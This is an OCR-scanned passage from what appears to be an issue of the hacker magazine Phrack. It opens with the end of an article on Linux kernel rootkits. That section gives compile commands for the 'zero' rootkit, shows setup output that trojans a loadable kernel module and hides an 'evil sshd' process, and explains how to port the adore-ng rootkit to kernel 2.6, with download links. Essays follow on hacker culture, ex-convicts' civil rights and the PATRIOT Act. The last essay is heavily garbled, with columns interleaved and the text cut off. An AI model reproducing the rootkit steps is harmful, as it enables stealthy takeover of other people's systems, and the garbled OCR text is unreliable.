cc -c -I/usr/src/linux/include -DSECRET_PATTERN=\"\\x37\\x8e\\x37\\x5£\"\ 
-O2 -Wall zero.c 

cc -c -I/usr/src/linux/include -DSECRET_PATTERN=\"\\x37\\x8e\\x37\\x5£\"\ 
-O2 -Wall -DSTANDALONE zero.c -o zero-alone.o 

cc -c -I/usr/src/linux/include -DSECRET_PATTERN=\"\\x37\\x8e\\x37\\x5£\"\ 


-O2 -Wall cleaner.c 
root@linux:zero# ./setup 
The following LKMs are available: 


af_packet ppp_async ppp_generic slhc iptable_filter 
ip_tables ipvé st sr_mod sg 

mousedev joydev evdev input uhci 

usbcore raw1394 ieeel394 8139t0co mii 

scsi cd cdrom parport_pc ppa 


Chose one: sg 

Choice was >>>sg<<< 

Searching for sg.o ... 

Found /lib/modules/2.4.20/kernel/drivers/scsi/sg.o! 


Copy trojaned LKM back to original LKM? (y/n) 


zero.o is for relinkage with one of the chosen modules, but since 
this is already inserted into kernel, the intruder needs a standalone module: 
zero-alone.o. 
For more ideas on linking and different platform approaches, please 
look at the particular article at [1]. 


-—-[ 6 as in 2.6 


As of writing, the 2.6 Linux kernel is already in testing phase, and 
soon the first non-testing versions of it will be available. So, it 
is probably time to look at the new glitches. At [4] you find a 
version of adore-ng that already works with the Linux kernel 2.6. 
Beside some new headers the rootkit will need, the signatures 
of some functions we need to redirect changed. A not unusual thing. 
Not too much challenging. In particular the init and cleanup 
functions have to be announced to the LKM loader in a different way: 


ifdef LINUX26 

static int __init adore_init() 
else 

int init _module () 

endif 


and 


static void __exit adore_cleanup () 
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else 
int cleanup_module() 
endif 


ifdef LINUX26 

module_init (adore_init); 
module_exit (adore_cleanup) ; 
endif 


No big thing either. Adore-ng already uses the new VFS technique 
to hide files and processes, so we do not need to care about sys_call_table 
layout. 
The most time-consuming part of porting adore to the 2.6 kernel was 
to find out how the LKMs are build at all. Its not enough to "cc" 
them to a single object file anymore. You have to link it against 
some other object-file compiled from a C-file containing certain infos 
and attributes like a 


MODULE_INFO(vermagic, VERMAGIC_STRING) ; 


for example. I do not know why they depend on this. 
And thats all for 2.6! No magic at all, except some hooks introduced 
in the kernel seem worth a look. :-) 


--[ 7 Last words & references 


Zero rootkit does not hide files, and it only hides the evil sshd process 
by removing it from the task-list. It is not wise to "halt" the system from 
such a process or its child. I tested zero on a SMP system but it freezed. 
No matter whether it was me or the "-f" insmod switch I had to use because 
of the different versions. If anyone is willing to grant (legal ofcorse!) 
access to a SMP box, let the phrack team or me know. Zero is experimental 
stuff, so please do not tell me you do not like it because it is missing 

a GUI or stuff. 


Some links: 


1] Infecting Loadable Kernel Modules (in this release) 
2] Hacking da Linux Kernel Network Stack (in this release) 
3] http://stealth.7350.org/empty/zero.tgz 
(soon appears at http://stealth.7350.org/rootkits) 
4] http://stealth.7350.org/rootkits/adore-ng-0.24.tgz 
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| 
|=-=[ Quick News ] | 
| 


Microsoft got hit by SQL slammer worm: 
[1] http://www.cnn.com/2003/TECH/biztech/01/28/microsoft.worm.ap/index.html 
[2] http://www.thewmurchannel.com/technology/1940013/detail.html 


They say they cought /’/Fluffi Bunny’: 
[1] http://www.salon.com/tech/wire/2003/04/29/fluffi_bunni/index.html 
[2] http://www.nandotimes.com/technology/story/872265p-6086707c. html 


How Geroge W. Bush Won the 2004 Presidential Election. This article 
outlines the danger of electronic voting systems. It explains why voting 
systems are vulnerable to fraudulent manipulation by the companies 
manufactoring and supervising the systems. 

[1] http://belgium. indymedia. org/news/2003/07/70542.php 


FBI Says Iraw Situation May Spur ‘’Patriotic Hackers’ 
[1] http://www.washingtonpost.com/wp-dyn/articles/A64049-2003Feb12.html 


Over 5 million Visa/MasterCard accounts hacked into. This happens all the 
day long but once in a while is one journalist making a media hype out of 
it and everyone starts to go crazy about it. Wehehehhehee. 
[1] http://www. forbes.com/markets/newswire/2003/02/17/rtr881826.html 


The Shmoo group build a robot that drives around to find WiFi AccessPoints. 
Wonder how long it will take until the first hacker mounts a WiFi + Antenna 
under a low-flying zeppelin / model aircraft... 

[1] http://news.com.com/2100-1039_3-5059541.html 


Linux achieved the Common Criteria security certification and is now 
allowed to be used by the federal government and other organizations. 
[1] http://www. fcw.com/fcw/articles/2003/0804/web-lLinx-08-06-03.asp 


$55 million electronic voting machines can be hacked into by a 
15-year-old newbie. Guess who will win the 2004’ election? 
[1] http://www.washingtonpost.com/wp-dyn/articles/A25673-2003Aug6.html 


UK Intelligence and Security Report Aug 2003. I like the quote: "Britain 
has a complicated and rather bureaucratic political control over its int 
elligence and security community and one that tends to apply itself to 
long-term targets and strategic intelligence programs, but has little real 
influence on the behaviour and operations of SIS or MI5." 

[1] http://cryptome.org/uk-intel.doc 


Man jailed for linking to bomb-side. Judge, psst, *hint*: Try 
http://www.google.com -> homemade bombs -> I feel lucky. Eh? Going to jail 
google now? Eh? 

[1] http://www.cnn.com/2003/TECH/internet/08/05/anarchist.prison.ap/index.html 


The military is thinking of planting propaganda and misleading stories in 
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the international media [1]. A new department has been set up inside the 
Pentagon with the Orwellian title of the Office of Strategic Influence. 

The government had to rename the new department when its name leaked ([2]). 
1] http://news.bbc.co.uk/1/hi/world/americas/1830500.stm 

2] http://www.fas.org/sgp/news/secrecy/2002/11/112702.html1 

3] http://www. fas.org/sgp/news/2002/11/dod111802.html 


=-=[ Hacker Generations ] | 


Hacker Generations 
by 


Richard Thieme <rthieme at thiemeworks.com> 


Richard Thieme speaks writes and consults about life on the edge, 
creativity and innovation, and the human dimensions of technology. His 
exploraitions of hacking, security, and many other things can be found at 
http://www.thiemeworks.com). A frequent speaker at security conferences, he 
keynoted the Black Hat Briefings - Europe in Amsterdam this year, the 
security track of Tech Ed sponsored by Microsoft Israel in Eilat, and 
returns to keynote Hiver Con in Dublin for a second time in November. In 
addition to numerous security cons (Def Con 4,5,6,7,8,9,10,1lland Black Hat 
1,2,3,4,5,6,7, Rubicon 2,3,4,5), he has spoken for the FBI, Infragard, the 
FS-ISAC, Los Alamos National Laboratory, and the US Department of the 
Treasury. Clients include Microsoft Israel, GE Medical Systems, and Network 
Flight Recorder. 


First, the meaning of hacker 


The word originally meant an inventive type, someone creative and 
unconventional, usually involved in a technical feat of legerdemain, a 
person who saw doors where others saw walls or built bridges that others 
thought were planks on which to walk into shark-filled seas. Hackers were 
alive with the spirit of Loki or Coyote or the Trickster, moving with 
stealth across boundaries, often spurning conventional ways of thinking and 
behaving. Hackers see deeply into the arbitrariness of structures, how form 
and content are assembled in subjective and often random ways and therefore 


how they can be defeated or subverted. They s atoms where others s a 
seeming solid, and they know that atoms are approximations of energies, 
abstractions, mathematical constructions. At the top level, they s th 


skull behind the grin, the unspoken or unacknowledged but shared 
assumptions of a fallible humanity. Thats why, as in Zen monasteries, where 
mountains are mountains and then they are not mountains and then they are 
mountains again, hacker lofts are filled with bursts of loud spontaneous 
laughter. 


Then the playful creative things they did in the protected space of 
their mainframe heaven, a playfulness fueled by the passion to know, to 
solve puzzles, outwit adversaries, never be bested or excluded by arbitrary 
fences, never be rendered powerless, those actions began to be designated 
acts of criminal intent.. That happened when the space inside the 
mainframes was extended through distributed networks and ported to the rest 
of the world where things are assumed to be what they seem. A psychic space 
designed to be open, more or less, for trusted communities to inhabit, 
became a general platform of communication and commerce and security became 
a concern and an add-on. Legal distinctions which seemed to have been 
obliterated by new technologies and a romantic fanciful view of cyberspace 
a la Perry Barlow were reformulated for the new not-so-much cyberspace as 
cyborgspace wher veryone was coming to live. Technologies are first 
astonishing, then grafted onto prior technologies, then integrated so 
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deeply they are constitutive of new ways of seeing and acting, which is 
when they become invisible. 


A small group, a subset of real hackers, mobile crews who merely 
entered and looked around or pilfered unsecured information, became the 
definition the media and then everybody else used for the word "hacker. "A 
hacker became a criminal, usually defined as a burglar or vandal, and the 
marks of hacking were the same as breaking and entering, spray painting 
graffiti on web site walls rather than brick, stealing passwords or credit 
card numbers. 


At first real hackers tried to take back the word but once a word is 
lost, the war is lost. Hackernow means for most people a garden variety of 
online miscreant and words suggested as substitutes like technophile just 
don’t have the same juic 


So let’s use the word hacker here to mean what we know we mean becaus 
no one has invented a better word. We dont mean script kiddies, vandals, or 
petty thieves. We mean men and women who do original creative work and play 
at the tip of the bell curve, not in the hump, we mean the best and 
brightest who cobble together new images of possibility and announce them 
to the world. Original thinkers. Meme makers. Artists of pixels and empty 
spaces. 


Second, the meaning of hacker generations 


In a speech at the end of his two terms as president, Dwight Eisenhower 
coined the phrase "military-industrial complex" to warn of the consequences 
of a growing seamless collusion between the state and the private sector. 
He warned of a changing approach to scientific research which in effect 
meant that military and government contracts were let to universities and 
corporations, redefining not only the direction of research but what was 
thinkable or respectable in the scientific world. At the same time, a 
"closed world" as Paul N. Edwards phrased it in his book of the same name, 
was evolving, an enclosed psychic landscape formed by our increasingly 
symbiotic interaction with the symbol-manipulating and identity-altering 
space of distributed computing, a space that emerged after World War II and 
came to dominate military and then societal thinking. 


Eisenhower and Edwards were in a way describing the same event, the 
emergence of a massive state-centric collaboration that redefined our 
psychic landscape. After half a century Eisenhower is more obviously 
speaking of the military-industrial-educational-entertainment-—and-media 
establishment that is the water in which we swim, a tangled inescapable 
mesh of collusion and self-interest that defines our global economic and 
political landscape. 


The movie calls it The Matrix. The Matrix issues from the fusion of 
cyborg space and the economic and political engines that drive it, a 
Simulated world in which the management of perception is the cornerstone of 
war-and-peace (in the Matrix, war is peace and peace is war, as Orwell 
foretold). The battlespace is as perhaps it always has been the mind of 
society but the digital world has raised the game to a higher level. Th 
game is multidimensional, multi-valent, played in string space. The 
manipulation of symbols through electronic means, a process which began 
with speech and writing and was then engineered through tools of literacy 
and printing is the currency of the closed world of our CyborgSpace and the 
military-industrial engines that power it. 


This Matrix then was created through the forties, fifties, sixties, and 
seventies, often invisible to the hackers who lived in and breathed it. The 
hackers noticed by the panoptic eye of the media and elevated to niche 
celebrity status were and always have been creatures of the Matrix. The 
generations before them were military, government, corporate and think-tank 
people who built the machinery and its webbed spaces. 
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So I mean by the First Generation of Hackers, this much later 
generation of hackers that emerged in the eighties and nineties when th 
internet became an event and they were designated the First Hacker 
Generation, the ones who invented Def Con and all its spin-offs, who 
identified with garage-level hacking instead of the work of prior 
generations that made it possible. 


Marshall McLuhan saw clearly the nature and consequences of electronic 
media but it was not television, his favorite example, so much as the 
internet that provided illustrations for his text. Only when the Internet 
had evolved in the military-industrial complex and moved through 
incarnations like Arpanet and Milnet into the public spaces of our society 
did people began to understand what he was saying. 


Young people who became conscious as the Internet became public 
discovered a Big Toy of extraordinary proportions. The growing availability 
of cheap ubiquitous home computers became their platform and when they were 
plugged into one another, the machines and their cyborg riders fused. They 
co-created the dot com boom and the public net, and made necessary the 
security spaceperceived as essential today to a functional society. All day 
and all night like Bedouin they roamed the network where they would, hidden 
by sand dunes that changed shape and size overnight in the desert winds. 
That generation of hackers inhabited Def Con in the "good old days," the 
early nineties, and the other cons. They shaped the perception as well as 
the reality of the public Internet as their many antecedents at MIT, NSA, 
DOD and all the other thr letter agencies co-created the Matrix. 


So I mean by the First Generation of Hackers that extended or 
distributed network of passionate obsessive and daring young coders who 
gave as much as they got, invented new ways of sending text, images, sounds, 
and looked for wormholes that let them cross through the non-space of the 
network and bypass conventional routes. They constituted an online 
meritocracy in which they bootstrapped themselves into surrogate families 
and learned together by trial and error, becoming a model of self-directed 
corporate networked learning. They created a large-scale interactive system, 
self-regulating and self-organizing, flexible, adaptive, and unpredictable, 
the very essence of a cybernetic system. 


Then the Second Generation came along. They had not co-created the 
network so much as found it around them as they became conscious. Just a 
few years younger, they inherited the network created by their elders. The 
network was assumed and socialized them to how they should think and act. 
Video games were there when they learned how to play. Web sites instead of 
bulletin boards with everything they needed to know wer verywhere. Th 
way a prior generation was surrounded by books or television and became 
readers and somnambulistic watchers , the Second Generation was immersed in 
the network and became surfers. But unlike the First Generation which knew 
their own edges more keenly, the net made them cyborgs without anyone 
noticing. They were assimilated. They were the first children of the Matrix. 


In a reversal of the way children learned from parents, the Second 
Generation taught their parents to come online which they did but with a 
different agenda. Their elders came to the net as a platform for business, 
a means of making profits, creating economies of scale, and expanding into 
a global market. Both inhabited a simulated world characterized by porous 
or disappearing boundaries and if they still spoke of a digital frontier, 
evoking the romantic myths of the EFF and the like, that frontier was much 
more myth than fact, as much a creation of the dream weavers at CFP as the 
old west was a creation of paintings, dime novels and movies. 


They were not only fish in the water of the Matrix, however, they wer 
goldfish in a bowl. That environment to which I have alluded, the 
military-industrial complex in which the internet evolved in the first 
place, had long since built concentric circles of observation or 
surveillance that enclosed them around. Anonymizers promising anonymity 
were created by the ones who wanted to know their names. Hacker handles and 
multiple nyms hid not only hackers but those who tracked them. Th xtent 
of this panoptic world was hidden by denial and design. Most on it and in 
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it didn’t know it. Most believed the symbols they manipulated as if they 
were the things they represented, as if their tracks really vanished when 
they erased traces in logs or blurred the means of documentation. They 
thought they were watchers but in fact were also watched. The Eye that 
figures so prominently in Blade Runner was always open, a panoptic eye. 
The system could not be self-regulating if it were not aware of itself, 
after all. The net is not a dumb machine, it is sentient and aware because 
it is fused bone-on-steel with its cyborg riders and their sensory and 
cognitive extensions. 


Cognitive dissonance grew as the Second Generation spawned the Third. 
The ambiguities of living in simulated worlds, the morphing of multiple 
personas or identities, meant that no one was ever sure who was who. 
Dissolving boundaries around individuals and organizational structures 
alike ("The internet? C’est moi!") meant that identity based on loyalty, 
glue born of belonging to a larger community and the basis of mutual trust, 
could not be presumed. 


It’s all about knowing where the nexus is, what transpires there at the 
connections. The inner circles may be impossible to penetrate but in order 
to recruit people into them, there must be a conversation and that 
conversation is the nexus, the distorted space into which one is 
unknowingly invited and often subsequently disappears. Colleges, 
universities, businesses, associations are discovered to be Potemkin 
villages behind which the real whispered dialogue takes place. The closed 
and so-called open worlds interpenetrate one another to such a degree that 
the nexus is difficult to discern. History ends and numerous histories take 
their place, each formed of an arbitrary association and integration of 
data classified or secret at multiple levels and turned into truths, 
half-truths, and outright lies. 


Diffie-Hellman’s public key cryptography, for example, was a triumph of 
ingenious thinking, putting together bits of data, figuring it out, all 
outside the system, but Whit Diffie was abashed when he learned that years 
earlier (1969) James Ellis inside the closed worldof British intelligence 
had already been there and done that. The public world of hackers often 
reinvents what has been discovered years earlier inside the closed world of 
compartmentalized research behind walls they can not so easily penetrate. 
(People really can keep secrets and do.) PGP was well, do you really think 
that PGP was news to the closed world? 


In other words, the Second Generation of Hackers, socialized to a 
networked world, also began to discover another world or many other worlds 
that included and transcended what was publicly known. There have always 
been secrets but there have not always been huge whole secret WORLDS whose 
citizens live with a different history entirely but thats what we have 
built since the Second World War. Thats the metaphor at the heart of the 
Matrix and that’s why it resonates with the Third Generation. A surprising 
discovery for the Second Generation as it matured is the basis for 
high-level hacking for the Third. 


The Third Generation of Hackers knows it was socialized to a world 
co-created by its legendary brethren as well as numerous nameless men and 
women. They know that we inhabit multiple thought-worlds with different 
histories, histories dependent on which particular bits of data can be 
bought on the black market for truth and integrated into Bigger Pictures. 
The Third Generation knows there is NO one Big Picture, there are only 
bigger or smaller pictures depending on the pieces one assembles. 
Assembling those pieces, finding them, connecting them, then standing back 
to see what they say - that is the essence of Third Generation hacking. 
That is the task demanded by the Matrix which is otherwise our prison, 
where inmates and guards are indistinguishable from each other because w 
are so proud of what we have built that we refuse to let one another escape. 


That challenge demands that real Third Generation hackers be expert at 
every level of the fractal that connects all the levels of the network. It 
includes the most granular examination of how electrons are turned into 
bits and bytes, how percepts as well as concepts are framed and transported 
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in network-centric warfare/peacefare, how all the layers link to one 
another, which distinctions between them matter and which dont. How the 
seemingly topmost application layer is not the end but the beginning of the 
real challenge, where the significance and symbolic meaning of the 
manufactured images and ideas that constitute the cyborg network create a 
trans-planetary hive mind. That’s where the game is played today by the 
masters of the unseen, where those ideas and images become the means of 
moving the herd, percept turned into concept, people thinking they actually 
think when what has in fact already been thought for them has moved on all 
those layers into their unconscious constructions of reality. 


Hacking means knowing how to find data in the Black Market for truth, 
knowing what to do with it once it is found, knowing how to cobble things 
together to build a Big Picture. The puzzle to be solved is reality itself, 
the nature of the Matrix, how it all relates. So unless youre hacking the 
Mind of God, unless you’re hacking the mind of society itself, you arent 
really hacking at all. Rather than designing arteries through which the oil 
or blood of a cyborg society flows, you are the dye in those arteries, all 
unknowing that you function like a marker or a bug or a beeper or a gleam 
of revealing light. You become a means of control, a symptom rather than a 
cure. 


The Third Generation of Hackers grew up in a simulated world, a 
designer society of electronic communication, but sees through the fictions 
and the myths. Real hackers discover in their fear and trembling the 
courage and the means to move through zones of annihilation in which 
everything we believe to be true is called into question in order to 
reconstitute both what is known and our knowing Self on the higher side of 
self-transformation. Real hackers know that the higher calling is to hack 
the Truth in a society built on designer lies and then the most subtle, 
most difficult part - manage their egos and that bigger picture with 
stealth and finesse in the endless ambiguity and complexity of their lives. 


The brave new world of the past is now everyday life. Everybody knows 
that identities can be stolen which means if they think that they know they 
can be invented. What was given to spies by the state as a sanction for 
breaking laws is now given to real hackers by technologies that make spies 
of us all. 


Psychological operations and information warfare are controls in the 
management of perception taking place at all levels of society, from the 
obvious distortions in the world of politics to the obvious distortions of 
balance sheets and earnings reports in the world of economics. 
Entertainment, too, the best vehicle for propaganda according to Joseph 
Goebbels, includes not only obvious propaganda but movies like the Matrix 
that serve as sophisticated controls, creating a subset of people who think 
they know and thereby become more docile. Thanks for that one, SN. 


The only free speech tolerated is that which does not genuinely 
threaten the self-interest of the oligarchic powers that be. The only 
insight acceptable to those powers is insight framed as entertainment or an 
opposition that can be managed and manipulated. 


Hackers know they don’t know what’s real and know they can only build 
provisional models as they move in stealthy trusted groups of a few. They 
must assume that if they matter, they are known which takes the game 
immediately to another level 


So the Matrix like any good cybernetic system is self-regulating, 
builds controls, has multiple levels of complexity masking partial truth as 
Truth. Of what else could life consist in a cyborg world? All over the 
world, in low-earth orbit, soon on the moon and the asteroid belt, this 
game is played with real money. It is no joke. The surrender of so many 
former rights - habeas corpus, the right to a trial, the freedom from 
torture during interrogation, freedom of movement without papers in ones 
own country - has changed the playing field forever, changed the game. 


Third Generation Hacking means accepting nothing at face value, 
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learning to counter counter-threats with counter-counter-counter-moves. It 
means all means and ends are provisional and likely to transform themselves 
like alliances on the fly. 


Third Generation Hacking is the ability to free the mind, to live 
vibrantly in a world without walls. 


Do not be deceived by uniforms, theirs or ours, or language that serves 
as uniforms, or behaviors. There is no theirs or ours, no us or them. There 
are only moments of awareness at the nexus where fiction myth and fact 
touch, there are only moments of convergence. But if it is all on behalf of 
the Truth it is Hacking. Then it can not fail because the effort defines 
what it means to be human in a cyborg world. Hackers are aware of the 
paradox, the irony and the impossibility of the mission as well as the 
necessity nevertheless of pursuing it, despite everything. That is, after 
all, why they’re hackers. 


Thanks to Simple Nomad, David Aitel, Sol Tzvi, Fred Cohen, Jaya Baloo, and 
many others for the ongoing conversations that helped me frame this article. 


Richard Thieme 


| 
|=-=[ Citizen Questions on Citizenship ] 
| 


by Bootleg 


(Please READ everything then check out my posts by Bootleg on this forum: 
http://forums.gunbroker.com/topic.asp?TOPIC_ID=22130) 


"A Citizen Questions on Citizenship" or "Are outlaws screwing your inlaws 
without laws?" 


What’s the difference in "Rights" between a citizen who is an excon and 
a citizen who is not? What law gives the government the right to 
permanently take away certain rights from an excon without a judge 
proscribing the rights be taken away? When has an excon ever been taken to 
court to have his civil rights stripped away permanently? 


When has an excon ever been arrested and prosecuted on any law that 
specifically says since they are excons they must now go to trial to fight 
for their right to keep all their civil rights? In American law, ONLY a 
JUDGE can proscribe penalties against a citizen and only after being 
allowed a trial by his peers and only for specific charges brought against 
him. How then can an excons rights be stripped away if he has never been in 
front of a judge for a charge of possessing civil rights illegally? What 


law exists that states certain civil rights exist only for certain people? 


I’ve been convicted of several felonies and not once during sentencing 
has any judge ever said I was to loose any of my civil rights as part of my 
sentence! If no judge has ever stripped my rights as part of any criminal 
sentence they gave me, how then can I not still have them? Furthermore... 
why does my wife and children also loose some of their civil rights simply 
because they are part of my family even though they have never committed 
any crime???? 


Are excons having their civil rights taken WITHOUT due process and 
without equal protection the true intent of the Bill of Rights and the 
Constitution? Or should all rights be restored after an excon pays his debt 
to society like they have always been throughout our history? Since an 


excon is still a citizen, then what kind of citizen is he under our 
Constitution that states all citizens have equal rights? If the government 
can arbitrarily take most of an excons rights away without due process, can 


they then take one or more rights away from other groups of citizens as 
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they see fit thus making a layered level of citizenship with only certain 
groups enjoying full rights? Either they can do this or they can’t 
according to the Constitution. If they do it to even one group of 
citizens...excons, then are they not violating the Constitution? Are all 
American citizens "EQUAL" the Constitution and is that not the intent of 
those that wrote the constitution as evidenced by their adding the "Bill of 
Rights" guaranteeing "Equality" for ALL citizens? 


Just as "blacks" were slaves and had no rights even as freemen in the 
past, even as women couldn’t vote till the 20th century, even as the aged 
and disabled were denied equal rights till recently, so now does one more 
group of millions of citizens exist that are being uncoonstitutionally 
denied their birthright as American citizens. This group is the millions of 
American citizens that are exconvicts and their families! ARE THEY CITIZENS 
OR NOT? The law says they still are citizens even if they are excons. If 
this is the case, then under our Constitution, are not ALL citizens equal 
having equal rights? 


If so, then exconvicts are illegally being persecuted and discriminated 
against along with their families. How would you rectify this? 


Nuff Said- 
Bootleg 


| 
|=-=[ The Molting Wings of Liberty ] 
| 


by Beaux75 


Thesis: The USA PATRIOT Act (USAPA) is too restrictive of the rights 
mandated by the Constitution and must be repealed. 


I. Introduction 
A. Circumstances leading up to the USAPA 
B. A rushed job 
C. Using public anxiety and war fever to push an unjust bill 


II. Domestic spying and the end of probable cause 
A. Breaking down restrictions on unlawful surveillance 
B. Side-stepping court orders and accountability 
C. Sneak and peek 
III. Immigrants as suspects 
A. Erosion of due process for legal immigrants 


B. Criminal behavior now subject to detention and deportation 
C. Denying entry based on ideology 
IV. Defining the threat 
A. Accepted definition of terrorism 
B. The USAPA and its overbroad definition 


C. "Domestic terrorism" 
V. Silencing dissent 
A. Questioning government policy can now be terrorism 
B. Public scrutiny encouraged by present administration 
es Recruiting Americans to inform on Americans 
2. Blind faith in political matters 
3. Keeping our leaders in check and our citizens informed 
VI. Refuting common retort 
A. "I do not want to be a victim of terrorism." 
B. "I have nothing to worry about because I am not a terrorist." 
Cc. "I am willing to compromise my civil rights to feel safer." 
VII. The future of civil rights at the present pace 
A. Expansion of unprecedented and unchecked power 
B. The illusion of democracy and our descent into fascism 


C. Our leaders no longer have the public’s best interests in mind 
VIII. Conclusion 

A. The USAPA trounces the rights guaranteed to all Americans 

B. People must stay informed 

C. Vigilance in the struggle to maintain freedom 
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are unfolding before us, yet somehow we ar 


ates civil liberties 
st" reaches too far 


Act is a stepping-stone toward fascism 
Signals the decline of a democracy 


ss of anti-terrorism efforts 


No longer have broad and corruptible powers 


prevent terrorism 


Must maintain the rights of the people 


The Molting Wings of Liberty 


In the darker alleys of Washington, DC, something very disturbing 


berties and our very way of life 


blind to it. What is shielding 


us from the truth about the future of America is the cataract of ignorance 
and misinformation brought on by mass paranoia. One thing is definite and 


overwhelming when the haze is lifted: our 
sacrificing our rights under the guise of 


In the six weeks after the worst t 


elected officials are knowingly 
national security. 


errorist attacks on US soil, a 


bill was hastily written and pushed through congress granting the executive 


branch extensive and far reaching powers t 


o combat terrorism. Thus, the 


awkwardly named "Uniting and Strengthening America by Providing Appropriate 
Tools Required to Intercept and Obstruct Terrorism" or USA PATRIOT Act 


(USAPA) was signed into law on October 26, 
in his remarks on the morning of the bill’ 
an essential step in defeating terrorism, 
constitutional rights of all Americans" (1 
law protects our constitutional rights whe 
five of the ten amendments in the Bill of 


2001. President George W. Bush, 
s signing stated, "Today we take 
while protecting the 
). How can it be said that this 
n it can be utilized to violate 
Rights? The USAPA is a classic 


example of political over-correction: it may provide our government and law 
nforcement agencies with "appropriate tools" for combating terrorism, but 
at what cost to the basic freedoms that this country was founded upon? 


Simply put, the USA PATRIOT Act is 
American people because its potential for 
Still, the 342-page tract was forced throu 
with next to no internal debate and very 1 
Despite massive objection from civil right 


extremely dangerous to the 
corruptibility is so great. 

gh Congress in near record time 
ittle compromised revision. 

s watchdogs, it passed by an 


unprecedented vote of 356-to-66 in the Hou 


se of Representatives, and 


98-to-1 in the Senate (Chang). The Bush administration considered the 


USAPA an astounding bipartisan success, bu 
of exactly what its provisions called for 
in order to gain such an encompassing vict 
superceded by a "sunset clause" making som 
intrusive abilities subject to expiration 
recently, there have been numerous reports 


Congress and their attempts to lift the su 
powers permanent ("GOP Wants") 


t neglected to inform the public 
and conveniently left out that, 
ory, many of the new powers wer 
e of the more sweeping and 

on December 31, 2005. Most 

of the Republican controlled 
nset clause making these broad 


Admittedly, the abilities mandated in the USAPA might help to 
counteract terrorism to a minor degree, but the price of such inspired 


safety means the systematic retooling of t 
American citizen is entitled to. There is 


he very principles that every 
no doubt that this legislation 


is a result of public outcry to ensure th 


vents of September 11, 2001 


never happen again, but the administration’s across-the-board devotion to 


internal secrecy was largely able to keep 


the bill from public eyes until 


after it was jettisoned into law. Even now, more than a year and a half 


after its inception, no one seems to know 


From the Senate floor, under scrut 
USAPA legislation, Wisconsin Senator Russ 
on the bill: 


what the USAPA is or does. 


iny for his lone vote against the 
Feingold delivered his thoughts 


There is no doubt that if we lived in a police state, it would be 
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easier to catch terrorists. If we lived in a country where police 
were allowed to search your home at any time for any reason; if we 
lived in a country where the government is entitled to open your 
mail, eavesdrop on your phone conversations, or intercept your 
e-mail communications; if we lived in a country where people could 
be held in jail indefinitely based on what they write or think, or 
based on mere suspicion that they are up to no good, the 
government would probably discover more terrorists or would-be 
terrorists, just as it would find more lawbreakers generally. But 
that wouldn’t be a country in which we would want to live. (qtd. 
in Hentoff) 


Senator Feingold’s words make up a very relevant issue that has 
been mentioned, but largely ignored by the Bush administration. It seems 
reasonable that most Americans would be willing to compromise certain 
liberties in order to regain the necessary illusion of safety. But what is 
not universal is that those compromises become permanent. In the wake of 
recent Republican activity and the other proposed methods of quashing 
terrorism, it is becoming more and more vital that the people of America 

ducate themselves on this issue and urge their leaders to repeal the USAPA 
on the grounds that it is grossly unconstitutional. 


At the heart of the USAPA, is its intent to break down the checks 
and balances among the three branches of government, allowing for a 
wholesale usurping of dangerous powers by the executive branch. Because of 
this bill, the definition of terrorism has been broadened to include crimes 
not before considered such; our first amendment rights of free speech, 
assembly and petition can now fall under the heading of "terrorist 
activity" and thusly, their usage will surely be discouraged; by merely 
being suspected of a crime, any crime, it can strip legal immigrants of 
their civil rights and subject them to indefinite detainment and possible 
deportation; and most alarmingly of all, ina fit of extreme paranoia, it 
allows for unprecedented domestic spying and intelligence gathering ina 
cold war like throwback to East Berlin’s Ministry of State Security 
(STASI). 


On the subject of domestic spying, news analyst Daniel Schorr, in 
an interview during All Things Considered on National Public Radio in the 
latter half of 2002 said, "Spying on Americans in America is a historic 
no-no that was reconfirmed in the mid-1970s when the CIA, the FBI and the 
NSA got into a peck of trouble with congress and the country for conducting 
surveillance on Vietnam War dissenters. A no-no, that is until September 
1lith. Since then, the Bush administration has acted as though in order to 
protect you, it has to know all about you and everyone" (Neary). 


Never before in the United States have law enforcement and 
intelligence agencies had such sweeping approval to institute programs of 
domestic surveillance. In the past, things like wire-tapping, Internet and 
e-mail monitoring, even access to library records were regulated by 
judicial restrictions in conjunction with the fourth amendment and 
"probable cause." Because of the USAPA, warrants have been made virtually 
inconsequential and probable cause has become a thing of the past. Medical 
records, bank transactions, credit reports and a myriad of other personal 
records can now be used in intel gathering (Collins). Even the 
restrictions on illegally gained surveillance and so-called "sneak and 
peek" searches (that allow for covert, unwarranted, and in many cases 
nknown, searches and possible seizures of private property) have been 
ifted to the point of perhaps being admissible as evidence. Mind you, 
his is not just for suspicion of terrorist activity, but rather all 
riminal activity and it can be corrupted to spy on anyone, regardless of 
eing a suspect or not. In addition to all of this, there is a clause in 
he USAPA that insulates the agencies who use and abuse these powers from 
ny wrong doing as long as they can illustrate how their actions pertain to 
ational security (Chang). Under these provisions, everyone is a suspect, 
egardless of guilt. When no meaningful checks and balances are in play, 
here is enormous capacity for corruption. 


tHRoROatCOA tH EG 


For the sake of argument, say that an administration has a faceless 
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enemy in which they know to be affiliated with an organization that 
questions recent government policy. With this new power, th ntir 
organization and all of its present, past and future members can be spied 
on by local and national law enforcement agencies. Thanks to unchecked 
sneak and peek searches, the members’ private lives are now open for 
scrutiny and the intelligence gathered can be used to trump up charges of 
wrong-doing, even though the organization and its members have had their 
first and fourth amendments clearly violated. And because of asset 
forfeiture laws already long in place, the government can now seize the 
organization’s and its members’ property at will as long as they are 
labeled as suspects. Whether the case makes it to a courtroom or not is 
irrelevant. The government can now publicly question the integrity of the 
organization, thereby damaging its credibility and possibly negating its 
cause. All this, and much worse, can now be done legally and virtually 
without accountability. 


This closely parallels the 1975 Watergate investigation. On this 
topic, Jim McGee, journalist for The Washington Post, writes, "After wading 
through voluminous evidence of intelligence abuses, a committee led by Sen. 
Frank Church warned that domestic intelligence-gathering was a ’/new form of 
governmental power’ that was unconstrained by law, often abused by 
presidents and always inclined to grow" (1). 


Another flagrant disregard for basic civil and human rights is the 
USAPA’s stance on criminality and immigration. We have already seen 
immigrants suspected of crimes being detained unjustly. In the near 
future, we should expect to see a rise in deportation as well as a further 
erosion of due process for legal immigrants. It has now become legal to 
detain immigrants, whether under suspicion of criminality or not, for 
indefinite periods of time and without access to an attorney (Chang). This 
is in clear violation of their constitutional rights, but with the fear of 
terrorism looming overhead, anyone who champions their cause is subject to 
public survey. Immigration is a hot potato of unjust activity, but one 
that many Americans seem apt to ignore. Newcomers to our country are 
already treated as inferiors by our government and now, because of the 
USAPA legislation, they are treated as suspects before any crime is even 
committed. More alarmingly, federal law enforcement agencies now have 
influence to keep certain ethnicities out of America based on "conflicting 
ideologies" (Chang). The message being sent: conform to American standards 
and belief systems or risk deportation. The clause sounds more like a 
